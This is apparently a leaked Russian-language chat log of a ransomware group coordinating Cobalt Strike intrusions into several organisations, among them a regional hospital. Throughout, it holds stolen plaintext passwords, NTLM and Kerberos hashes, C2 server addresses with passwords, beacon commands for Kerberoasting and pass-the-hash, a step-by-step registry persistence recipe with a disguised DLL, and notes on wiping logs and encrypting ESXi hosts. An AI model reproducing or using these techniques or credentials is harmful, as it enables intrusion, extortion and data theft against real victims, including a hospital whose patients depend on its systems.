events.log weblog_443.log
```решение на тебетут я тебе не подскажуда вижуsyncing beaconlogно опять такитак там с логами ничего не связано большеточно те логи почистил?)``
root@hostname:~/cobalt/logs# rm -r *
root@hostname:~/cobalt/logs# ls
root@hostname:~/cobalt/logs#
``к`~/cobalt/logs/` эту папку очистинужно было прям все логи за все числа удалить?
root@hostname:~/cobalt/logs/201201# ls
root@hostname:~/cobalt/logs/201201#
``все равно логи осталисьвторого и ретьего там в логах только инфа о том, что я зашёл и вышелэто за первое числону и папки rm -r *ну 2 лога перенёс в /home/
остальное rm * сдела ты все логи удалил?на серваке удалил содержимое папки 201201у меня ни логов, ни архивов нетчтобы логи синхронились вместеи локальный клиент почистиснеси тогда содежимое папки логовблядоходит до 20к и начинает по 1 байту в секундуа не наоборотну лог он же сохранятеся из действий в кобене понял?в хоум переложилкак это должно помочь? я просто зайду в кобу и она создаст новый точно такой-жевыкинь за папку кобыда)))это же лога ну даотсюда`~/cobalt/logs/201201/139.62.193.40`вот сюда положил
`~/cobalt/logs`перемести лог в другое местоадфайнд проклятыйвот он``
beacon_1851575246.log
```))окейгод-месяц-числоа это датаглянь за то число на котором была проблема``
root@hostname:~/cobalt/logs# ls
201020 201023 201026 201029 201101 201104 201107 201110 201113 201116 201119 201122 201125 201128 201201
201021 201024 201027 201030 201102 201105 201108 201111 201114 201117 201120 201123 201126 201129 201202
201022 201025 201028 201031 201103 201106 201109 201112 201115 201118 201121 201124 201127 201130 201203
``все удалять?логов уймаsshcc[``
root@104.243.40.126:13063
f826w8LY1XdqJnrmtr1inZqLv2UAPkk4ecv
```а я тебе и не давал доступ)`ssh: connect to host 104.243.40.126 port 22: Connection refused`
`ssh: connect to host likenic.com port 22: Connection refused`
`ssh: connect to host likenic.com port 38542: Connection refused`по ссх не пускает кстау меня на 21556 фризугу``
104.243.40.126:38542
JI07HSLOl2MtjxWe0UhqpolvHLJPZCAcL6M
```дай мне доступ в кобу где вся эта хуйня происходитчто за тема "не получается" и ничего не пробовать при этом чтобы починить? )ну зайди по ссх историю биконаглухоманьгде могли остаться доступы тудаи дай мне доступробуй зайти в другую кобуи как быть?бррне пускает в цитрикс``
https://vlab.unf.edu/vpn/index.html
N01447311
Commercial5207!
```так и делаю)проверять лучше с хоста откуда доступыс той же тачки+в идеале на той же тачке бы вообще)?сокс открыт в том же диапазоне где хост с которого сняли логины/не знаю, не сталкиваляsonic wall, не пускает с нашего дедика, креды валид`https://10.0.254.1:44433/cloudBackupSettings.htmlhttps://10.0.254.1:44433/main.htmlhttps://10.0.254.1:44433/postlogincheck.htmltext/x-snwl-prefstext/x-snwl-prefs`@tl2 или есть другие варианты как быть?и смотреть бэкапынадо доступы в их лк искать тамсейчас проверю серва где нашлис дкхех, нет)сокс кинут оттуда где взяли доступы?egl_admin\E@gle@x1s3030и креды валидвидимо только по рдп с их сервеработает, но с дедика не пускаетт е вцентр нашли с доступами и только ав?ну да возможнопри запуске билда его может удалить при подозрительном поведенииа не удалятся на статике?)на некторых серверах стоят по 3-4 едр лолнону криптерчто за стартер?и вроде не трогается ничемНуу, при выключеном виндефе стартер не удалятсяглавное чтобы вы знали куда зайти чтобы попасть в админкутогда снимаем браузер, либо заходим по рдп на его пк где доступ вебрут и делаем все оттудас большой вероятностью в вебруте стоит двухфакторка на телефонsuperlogin
```
URL : https://accounts.logme.in/ ( https://accounts.logme.in/login.aspx )
Username: tomw@itc-us.com
Password: Logmein123
``````
--- Chromium Credential (User: briang) ---
URL: http://itc-ship01/
Username : briang
Password : bdg2301
--- Chromium Credential (User: briang) ---
URL : http://itc-plm01/
Username : briang
Password : 194880195718849108860819488019597884910886001948801958988491088605194880195528849108854019488019538884910885421948801954088491088524
```
збс пасс )10.0.0.20
```
Bitdefender
Malwarebytes Anti-Exploit
Malwarebytes' Anti-Malware
Seagull Security (хз что это)
``````
UserDomain : ITC
UserName : superlogin
ComputerName : ITC-DC-SVR01.ITC.LOCAL
IPAddress : 10.0.0.14
SessionFrom :
SessionFromName:
LocalAdmin :
``````
UserDomain : ITC
UserName : superlogin
ComputerName : ITCMA-FILE02.ITC.LOCAL
IPAddress : 10.0.0.38
SessionFrom :
SessionFromName:
LocalAdmin :
``более эфективно в плане сервисных акковпопробуй через sharpview захантить - он иначе ищетя уже и с токеном самого суперлогина этого попробовалс токеном, да@user8 под ДА токеном запускал?
если да то все равно может не отработать потому что будет авторизационных ДК ивентов, если аккаунт сервисный какой-тос токеном ДА на ДК
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe superlogin
[*] Tasked beacon to run .NET program: SharpSniper.exe superlogin
[+] host called home, sent: 113727 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
``есть такой интересный админ
```
User name superlogin
Full Name Superlogin
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/21/2018 9:56:11 PM
Password expires Never
Password changeable 5/21/2018 9:56:11 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *ADSyncAdmins
Global Group memberships *Server Management *Discovery Management
*Hypervisor Access - V*Domain Users
*VMware Admins *Domain Admins
*Records Management *All ITC
*Recipient Management *Mailbox support
*Public Folder Managem*Organization Manageme
*SHOPTRAK CHINA USERS *SQL Access - FULL SER
``на админских ак есть такая штука на рабочем столе
```
screen mode id:i:2
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:24
winposstr:s:0,1,158,316,1182,1040
compression:i:1
keyboardhook:i:2
audiocapturemode:i:0
video playback mode:i:1
connection type:i:7
networkautodetect:i:1
bandwidthautodetect:i:1
displayconnectionbar:i:1
enableworkspacereconnect:i:0
disable wallpaper:i:0
allow font smoothing:i:0
allow desktop composition:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
full address:s:remote.itc-us.com
audiomode:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
redirectclipboard:i:1
redirectposdevices:i:0
autoreconnection enabled:i:1
prompt for credentials:i:0
negotiate security layer:i:1
remoteapplicationmode:i:0
alternate shell:s:
shell working directory:s:
gatewayhostname:s:
gatewayusagemethod:i:4
gatewaycredentialssource:i:4
gatewayprofileusagemethod:i:0
promptcredentialonce:i:0
gatewaybrokeringtype:i:0
use redirection server name:i:0
rdgiskdcproxy:i:0
kdcproxyname:s:
drivestoredirect:s:*
authentication level:i:2
username:s:itc\
devicestoredirect:s:*
``когда туда полезете не забудьте прокси с пк админаwebrootanywhere.com/v1/Account/loginа админка где? снаружи?user9user4user3https://www.ixbt.com/power/ups/multilink.shtmlна ДК
```
beacon> shell type C:\MultiLink\README.txt
[*] Tasked beacon to run: type C:\MultiLink\README.txt
[+] host called home, sent: 59 bytes
[+] received output:
README.TXT for Liebert MultiLink
Liebert developed MultiLink to protect computers from costly damage such as
loss of data resulting from power failures -- from single computers to large
networks. MultiLink constantly monitors one or more Liebert Uninterruptible
Power Supply (UPS), warns computer users of impending power loss and initiates
graceful operating system shutdowns when needed.
MultiLink on a host computer communicates with a Liebert UPS using network or
direct cable connections to detect loss of utility power and the status of the
UPS battery. For network communications, MultiLink employs the SNMP protocol
and IP addresses. For direct cable connections, MultiLink uses either serial
communications or contact closure, depending on the UPS model.
The MultiLink Advanced Shutdown version adds data analysis and notification
capabilities to the standard MultiLink shutdown features. This product permits
configurable responses to UPS status changes, including support for e-mail,
pagers, and command actions. MultiLink Advanced Shutdown also offers data
logging functionality to capture and trend historical data for trouble-shooting
and analysis.
For updates to MultiLink software or to purchase the MultiLink Advance Shutdown
version, visit http://multilink.liebert.com.
Technical Support:
U.S.A +1 800-222-5877
Outside the U.S.A. +1 614-841-6755
France +33 (0) 1 43 60 01 77
Germany +49 89 90 50 070
Italy +39 02 98250 324
Netherlands +31 (0) 33 2474072
U.K. +44 (0) 1628 403200
Spain +34 902 100 494
E-mail liebert.monitoring@emerson.com
Web Site http://multilink.liebert.com
The Company Behind the Products:
With over a million installations around the globe, Liebert
is the world leader in computer protection systems. Since
its founding in 1965, Liebert has developed a complete range
of support and protection systems for sensitive electronics:
- Environmental systems: close-control air conditioning from
1.5 to 60 tons.
- Power conditioning and UPS with power ranges from 250 VA to
more than 1000 kVA.
- Integrated systems that provide both environmental and power
protection in a single, flexible package.
- Monitoring and control -- from systems of any size or location,
on-site or remote.
- Service and support through more than 100 service centers
around the world, and a 24/7 Customer Response Center.
Copyright (c) 1997-2013 Liebert Corporation.
All rights reserved throughout the world. Specifications subject
to change without notice.
Liebert, the Liebert logo, and MultiLink are registered
trademarks of Liebert Corporation.
``так вот он чуть вышепо ад 6956 были живыскажи сразу сколько серверовпингану еще сервера и начинаемразбираем билд определяем метод`SIODFGO&DSIUgfsgFUT%UYESYTGU`user8user7user4user3)вдруг пригодится таки)))``
$krb5tgs$23$*agpm_admin$korbel.com agpmadmin
``EDR``
Netwrix.korbel.com [10.10.1.94] NETWRIX SERVER
```
```
URL : https://www.netwrix.com/sign_in.html
Username : ben.mandeville@korbel.com
Password : vZjFu3cH
``vSphere
```
https://vcenter.korbel.com/
Username : ben.mandeville@korbel.com
Password : 1234qwerASDF!@#$
``спокойнойббк 6окей +2 часаЭто отработвл 14 часов на отдых 10 из которых 2 на дорогуподготовка к закрытиюПочему так рано?завтра к 4тогда на этом вседатут закончили?прибиваю дкживых 99
42 восстановили
42 закрыто\примаплено\убиты процесы
есхы потерты
рубрик потертну все получаетсяMAIN\blove wingnut12#
MAIN\Administrator cr1spy173
MAIN\rthomas !@#monstrosity2002``
172.93.110.218:54536
wEjNq0mz7Dji7TjM6Xv3LIovTZIndMQkbjj
``````
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
ERROR: The RPC server is unavailable.
```
```
PYXIS-CCE-PROD.main.crispregional.org
ERROR: Logon failure: unknown user name or bad password.
```
```
NovaNet.main.crispregional.org
не вывел тасклист без ошибки
``````
Admin
G0F0rw@rd123!
10.75.0.170
10.75.0.171
10.75.0.172
10.1.0.170
10.1.0.171
10.1.0.172
``````
crhsesxi20.main.crispregional.org
crhsesxi21.main.crispregional.org
crhsesxi22.main.crispregional.org
crhsesxi23.main.crispregional.org
crhsesxi24.main.crispregional.org
crhsesxi25.main.crispregional.org
crhsesxi26.main.crispregional.org
crhsesxi27.main.crispregional.org
``всего
```
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
NovaNet.main.crispregional.org
HISCODER.main.crispregional.org
```не пошифр
```
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
``FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispregional.org
CRR-WEB-FS01.main.crispregional.org
CRR-WEB-BG01.main.crispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org``
pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24
``````
TrinisysQA-APP.main.crispregional.org
Trinisys-A8.main.crispregional.org
Trinisys-A7.main.crispregional.org
Trinisys-A6.main.crispregional.org
Trinisys-A5.main.crispregional.org
Trinisys-A4.main.crispregional.org
Trinisys-A2.main.crispregional.org
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
PyxisPharmTest.main.crispregional.org
PyxisPharmLive.main.crispregional.org
pyxismed.main.crispregional.org
PYXIS-DB.main.crispregional.org
PYXIS-CCE-TEST.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
pyxisanest.main.crispregional.org
NovaNet.main.crispregional.org
Medisolv.main.crispregional.org
INFOTVSV5.main.crispregional.org
INFOTVSV4.main.crispregional.org
INFOTVSV3.main.crispregional.org
InfoTVsV2.main.crispregional.org
INFOTVSV1.main.crispregional.org
HISCODER.main.crispregional.org
GEPACsTestWS
GEPACS-TestCCG
GEPACS-CCG
FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispregional.org
CRR-WEB-FS01.main.crispregional.org
CRR-WEB-BG01.main.crispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org
``еще неттак ну что, добили?
10.1.21.95
10.1.21.98
``````
crhsesxi24.main.crispregional.org
crhsesxi27.main.crispregional.org
``eThoit4Rueh4aigheiDeiquaугу значит ок``
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:/ProgramData/pshashes.txt -append -force -encoding UTF8 into 4540 (x64)
``команда включает в себя хешкат параметр?это инвок-керб снимал из тулчейнаформат хешката?нетузакрепилсюда сразу дублируйа ты закрепил?кербы скинул тл2убез ответагрупы и оушки не снимаются чотаотпиште в групы в которыз работайтеТакс, ну давайте посмотрим что сделали пока меня не было и в целом что сделаноПривет!Всем приветhiубираем свои файлы и до завтратогда в слипДавсе поставили?До вечерадакстати дл собирали с флагом -keep?по 1-2 шт где есть вомзожностьвезде поставили?``
beacon> shell reg query HKCU\Environment
[*] Tasked beacon to run: reg query HKCU\Environment
[+] host called home, sent: 57 bytes
[+] received output:
HKEY_CURRENT_USER\Environment
Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
OneDrive REG_EXPAND_SZ C:\Windows\system32\config\systemprofile\OneDrive
UserInitMprLogonScript REG_SZ rundll32.exe C:\Windows\Temp\STA-NURSEAL-20201020-2033.dll,entryPoint
``````
- Загружаем полученную DLL в доступную для записи директорию
- ПКМ на сессию, persistence - non-elevated - userinitmprlogonscriptkey
- Вписываем Command: rundll32.exe C:\temp\keep64.dll,entryPoint (ОБЯЗАТЕЛЬНО указываем полный путь до dll файла, ОБЯЗАТЕЛЬНО переименовываем dll файл перед загрузкой во что-нибудь более "органичное" в зависимости от окружающих его файлов)
- Запускаем
- Проверяем создалась ли запись в реестре командой бикона shell reg query HKCU\Environment
```1 это обязательно и 2 если все пойдет хорошозавтра к 4 и завтра обязательно закрывает 1-2 сетипоставьте в текущих сетях новых и можете идтисоберите себе егоhttps://github.com/0xthirteen/StayKitокили в конце этого месяцаили через месяцтак что новые по факту получения сразу проверяйтекогда?старые кобы потом отключаткак факто вы из англии[ ](https://mediaeveryone.com/channel/general?msg=ZxszvNDaKbZKfk3fL) take itразбирайте у кого еще нет``
23.106.160.195
https://topevi.com
-
185.150.190.113:61718
O5xFflqDG7LDQJUDbdtkkj54zQ8QDVMMI0W
``коба``
74.118.138.108
https://wolfnew.com
-
209.222.98.96:32878
onsOJxzeGz75Nt2p0tGYzjn7oTi5Eo6F644
```Парни пишем сюда по VPN https://helpdocpt.club/forums/vpn.11/ как чё кого``
user3
user3 @user3
💬
02:00
Домен
ing server: STAKC-DC2019.STAKC.local:389
tl1
Team Lead 1 @tl1
Admin
02:01
т е конфу создать?
user3
user3 @user3
💬
02:01
да
user 7,4,9,3
``О которой я тебя просилкакой?Конфа будет или нет?либо taken красный цветанк не показательвсе anc или висятестьа вроде и нетуоктам еще открытые свободные естьчек дальшеюзер оффDC
```
Server Name IP Address
----------- ----------
FISHUSA-DC 192.168.1.91
``EA
```
Administrator
``DA
```
Administrator dc-admin djpastore3219
percona3487
``здравствуйте тимлидушки* Username : nddevbernst
* Domain : JDOSSN
* NTLM : 5b622ad5d550408ed6260c2b8fb185cc>sAMAccountName: nddevkremmeкреды сегодня сменили
это новые
pth JDOSSN\ndmicjsater 67595f137f5908e3ed202bc4b14aa9я вижу тут в плане эскалации просто планомерное изучение файлов/шар/доступных АРМ/содержимого браузеров/кэша/почты.не керберостя именно про тикеты сейчасобязательно проверяйте на доступный хостах какие в памяти есть керберос тикетыда в хоумдиры тоже заглянему них какие-то технические права даже есть как видишьу вас есть пользаки тут которые не самые хуевые так тохоумдиры пользователей смотритено попасть на них не выходит``
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
[+] received output:
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)
[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)
[+] received output:
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)
[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)
[+] received output:
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)
[+] received output:
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)
[+] received output:
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
[+] received output:
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
[+] received output:
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
``иначе обычно работать ничего не можетсервера будут видеть другие сабнеты и сегментыищите сервера.значит тут разграничение правил доступа идет через групы как разагаверно?дакакого-тоя могу предположить что вы не можете выбраться сабнетасудя по имеющимся на текущий момент пользакамтам хорошая связка показана импакета с лсаси с бладхаундомбудем пробовать.имет варианты дампа лсас и его дешифровкион хорошпоиграйтесь с инструментомработает опираясь на бладхаунд если правильон настроенну и прямого пути до ДА нетну вот lsassyда, там план атаки вроде есть, но он опирается на тачки, которых не видно в сети..а при некоторых - нет = )при некоторых условияхтам вцелом понятно какие групы адмиятну насколько я помню опирается на состав managed objects если таковой прописанага, только поменял комп и она на старом осталасьснял?да я уже)я признаться этой штукой не пользуюсь и обычно стараюсь аккуратно с крупными это будет дико шумнопопробуем))можно еще снять bloodhound....додумать и проверить догадку)а как то можно узнать, какие право дает например NDLEADING_Computer_Account_Adminsпальпируя сеточкупричем без просто брута а чисто аккуратно и нженоесли приглядетьсявообщем
тут есть куда жать кнопки дальше>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
вот еще у девочки есть такая групаих хоум диры под их токеном при пряом браузинге "подтягиваемой" директории``
>homeDirectory: \\jdossn.local\homedirs\NDLEADING\ndcarhsherm
``тут хоум дира подтягивается с ФСу этих пользаков тачки пустые да теперь еще одна особенностьрандомно
посмотрел куда это дело катитна OU=NDLEADING
и на OU=SD**я бы почекал этого юзератеперь ОБРАТНО в ад_компсесть!а есть ли OU=NDLEADING ?теперь дальшеOU=WIRIESTERER
тоже ОУшкатакое есть
в ад_компсальтернативная группа>memberOf: CN=WIRIESTERER_SD_Adminsтакого нет. sd это походу префикс означающий локациюидем логическиищем дальше ручкамисамое очевидное - поиск по OU=SDвопрос - что такое SD?
ищем на него ответа вот что придумать с пассворд_ресет ...который в группе SD_Adminsвот у нас есть этот хренсмотрите
читаем внимательно АДда, я тоже обратил внимание. Под адми в основном по сети и двигалсяили вот эта
```
>memberOf: CN=NDLEADING_SD_Admins,OR=Groups,OR=NDLEADING,OR=Customers,DC=jdossn,DC=local
```смотрите какая группка интересная не?>memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local``
User name ndcarjjohns
Full Name Justin Johnson
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/15/2020 7:35:46 AM
Password expires 1/7/2021 7:35:46 AM
Password changeable 10/16/2020 7:35:46 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcarjjohns
Last logon 10/19/2020 7:33:11 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_All_Users
*NDLEADING_EQUIP_Users*NDLEADING_All_Email
*NDLEADING_SD_Technicians*NDLEADING_ALL
The command completed successfully.
``````
User name ndcardkolst
Full Name Darlene Kolstad
Comment carrington, nd
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/20/2020 1:54:07 PM
Password expires 1/12/2021 1:54:07 PM
Password changeable 10/21/2020 1:54:07 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcardkolst
Last logon 10/22/2020 7:31:17 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *NDLEADING_ACCOUNTING *Domain Users
*NDLEADING_Computer_Ac*NDLEADING_All_Users
*NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users
*NDLEADING_EQUIPRDB-FI*NDLEADING_EQUIPPatch_
*NDLEADING_All_Email *NDLEADING_ALL
*NDLEADING_Excel_Users*NDLEADING SharePoint
*NDLEADING_Citrix_Loca
The command completed successfully.
``````
User name ndcarhsherm
Full Name Hunter Sherman
Comment Hunter Sherman
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/20/2020 3:49:45 PM
Password expires 1/12/2021 3:49:45 PM
Password changeable 10/21/2020 3:49:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcarhsherm
Last logon 10/22/2020 9:15:49 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_All_Users
*NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule
*NDLEADING_All_Email *NDLEADING_SD_Technicians
*NDLEADING_SD_Users
The command completed successfully.
``````
User name ndmicjsater
Full Name Jason Sateren
Comment Michigan,ND
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/22/2020 6:49:57 AM
Password expires 1/14/2021 6:49:57 AM
Password changeable 10/23/2020 6:49:57 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndmicjsater
Last logon 10/22/2020 7:08:15 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
*NDLEADING_PARTS *NDLEADING_Dealer_Port
*NDLEADING_Computer_Ac *NDLEADING_All_Users
*NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users
*NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_
*NDLEADING_All_Email *NDLEADING_SD_Managers
*NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins
*NDLEADING_SD_Technicians*NDLEADING SharePoint
*NDLEADING_ALL *NDLEADING_SD_Users
*NDLEADING_Excel_Users*NDLEADING SharePoint
*NDLEADING_Citrix_Loca*NDLEADING_EQUIPRDB-AL
The command completed successfully.
``````
User name ndcartcarr
Full Name Theresa Carr
Comment Theresa Carr
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/20/2020 11:54:49 AM
Password expires 1/12/2021 11:54:49 AM
Password changeable 10/21/2020 11:54:49 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcartcarr
Last logon 10/22/2020 7:02:59 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
*NDLEADING_Dealer_Port*NDLEADING_Computer_Ac
*NDLEADING_All_Users *NDLEADING_EQUIPRDB-SE
*NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule
*NDLEADING_All_Email *NDLEADING_SD_Managers
*NDLEADING_SERVICE *NDLEADING_ALL
*NDLEADING SharePoint
The command completed successfully.
``````
User name nddevbernst
Full Name Blaine Ernst
Comment BLAINE ERNST
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2020 6:22:54 AM
Password expires 1/13/2021 6:22:54 AM
Password changeable 10/22/2020 6:22:54 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\nddevbernst
Last logon 10/22/2020 2:16:08 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
*NDLEADING_Dealer_Port*NDLEADING_Computer_Ac
*NDLEADING_All_Users *NDLEADING_EQUIP_Users
*NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_
*NDLEADING_All_Email *NDLEADING_SD_Managers
*NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins
*NDLEADING_SD_Technicians*NDLEADING_ALL
*NDLEADING_Excel_Users*NDLEADING_Citrix_Loca
*NDLEADING_EQUIPRDB-AL
The command completed successfully.
``если
```
>trustAttributes: 0 []
```
то можно считать, что траст не фурычит?shell net user username /domвывидете пожалуйстапо тем пользакам которые естьэто крайней случайзерологон?ну етораз там из 4 трастов только 1 по сути живой и тот пингуется с лоссом 100%а может етосэкономит времяно рекомендую командно инструмент освоитьтребует дополнительной настройки как видитеlsassy очень пригождаетсявот на случай когда есть некоторое количество кред`ndmicjsater` `ndcarddalma` `nddevbernst`ytnя вам не кидал вот такой инструмент?
https://github.com/Hackndo/lsassyа щас парням скинулаане. это я собирал все что попадалосьполучилось?``
pth W08872612198 "Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a
Username : nddevbernst
Password : NDleading2021!
LEADMIN Deere0419!
Username : ndcartcarr
Domain: JDOSSN
NTLM: b25a68a3d5bc30ea97872f6b004c58be
SHA1: d7a0e055c8e4b9947e48d99a66223a3dbe522bee
Username : ndmicjsater
Domain : JDOSSN
NTLM : c60a90ad0e486ae0efd1229b04824948
SHA1: 450a811afd21b2f402b34575cbca7f386a3b2a47
DPAPI: 5708598b47c3d8cea60c8bbd8d6d12bf
jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:227a7d16ba750264459c885d666b7eaa:::
Username : ndcarhsherm
Domain : JDOSSN
NTLM: d7341bcb2ca0f8586c6f1974ead1ab1f
SHA1: c7b7b0db23a67ce02082c6351720a1fc5ac40d69
DPAPI: cfa41b24958547a50b0604ba6d0d04f6
Username : ndcardkolst
Domain : JDOSSN
NTLM : b9b6aa1456c1a351844910877a487cf9
SHA1: efae1f6b171a18bf4b16231fcc32d23df10e538e
DPAPI: a4dbe1e1a06257d0c44b1a009045169e
Username : ndcartcarr
Domain: JDOSSN
NTLM: 526ec72d381501fffb75e74934827f2f
SHA1: 9ccae5674e564db712b7a9be8ebcba4d754f57c9
DPAPI: c652bcd334907d5d084167b804d14ccf
* Username : ndcarrtedro
* Domain : JDOSSN
* NTLM : c9e553f47018e2be97ec3307bd47df25
* SHA1 : f6769930484ed5afd45e5aa95d1490e0fe2042e2
* Username : ndcarjjohns
* Domain : JDOSSN
* NTLM : 4178a0f16bad0c2a649398e88994568c
* SHA1 : ddc6c829305d0282c54b3fed400c67a999e71611
* DPAPI: 4fdbb5025f3fec11c123375623d2287a
* Username : ndcarjjohns
* Domain : JDOSSN.LOCAL
* Password : Ndleading11
* Username : nddevkodell
* Domain : JDOSSN
* NTLM: 1ae22c3e605fcb0a1d17d7c0b8509281
* SHA1: 780ca6033c42c3b6ab91fd119e5a1b4c2db2696f
* DPAPI: 0f4bacdbd1dc64f63ecfda1d9c05d690
* Username : ndcarddalma
* Domain : JDOSSN
* NTLM : db7aa0db0148b3b707b9ae6de91e3f25
* SHA1: 9eaec33adae1e6193d9c381e449271008c5b0035
* DPAPI: 830d9615902b542addd3faeeca02ba3e
``доброе утро странаuser9user8@tl2 добавь 8 и 9 сюдахостнейм домена не резолвится либо ловит 100% потерь?так ни разу не включался впн?eyJhbGciOiJBSOZdJej+HQUxGkLfwE47PNBlcVY5gpCszGI0B8JGEBEjaYYfWGMmRjxIL/OA+My9Eam/SwS6w5u3tuHdWvgE8MHaV9m41lLRFXJLfp+oI6mtpSZM1GvUMmMPRb6EdjioC1GX52kbuPOutrv2uatIfb4TIdld107GQ42OEOpX4evLdBdkBtrz17ob0wTqebQxGEBOh21ADZAzk4/9tbgbspvQaPahQttBzaWo4t8TVPwP39/sxLwtMm/DDv4ET0HZoF3torkbGe0pgRq6kCMZDeeePI6XTJzhLMDyUJzpfM3HTkxY3pxU03l+O3Bxgyve9MgfdoNcoKWPsjV1QxmLiUGyogc5QddtYfig64kBbRpBKzPpfb1lqVa5ktJiQkDxвсе, мой чижик домой ушел...есть один 2003. пробовал мс17, нетапи, блюкип, спулсс - все бестолку. Возможно 17-10 и сработает, но там креды нужны...37 штук видны всеготам видимых компов всего ничего, щас сопоставлю6 штук>operatingSystem: Windows Server 2003тогда не ждем хеши)а пароля от пользака неттолько сегодня домен появился. я же вчера вроде отписывался. домен за впном2 день в работе, вы только хеши сняли?там хотябы система нужна. а крест конечно рано ставить, только началидавайте сразу ставить крест на сети есть там учетка на входе не ДАредко хеши брутятсяредко бывает эетерналну редко там что то бывает...из 5 человек ни один не вспомнил?)я , кстати, забыл проверить в дескрипшнах. хорошо что 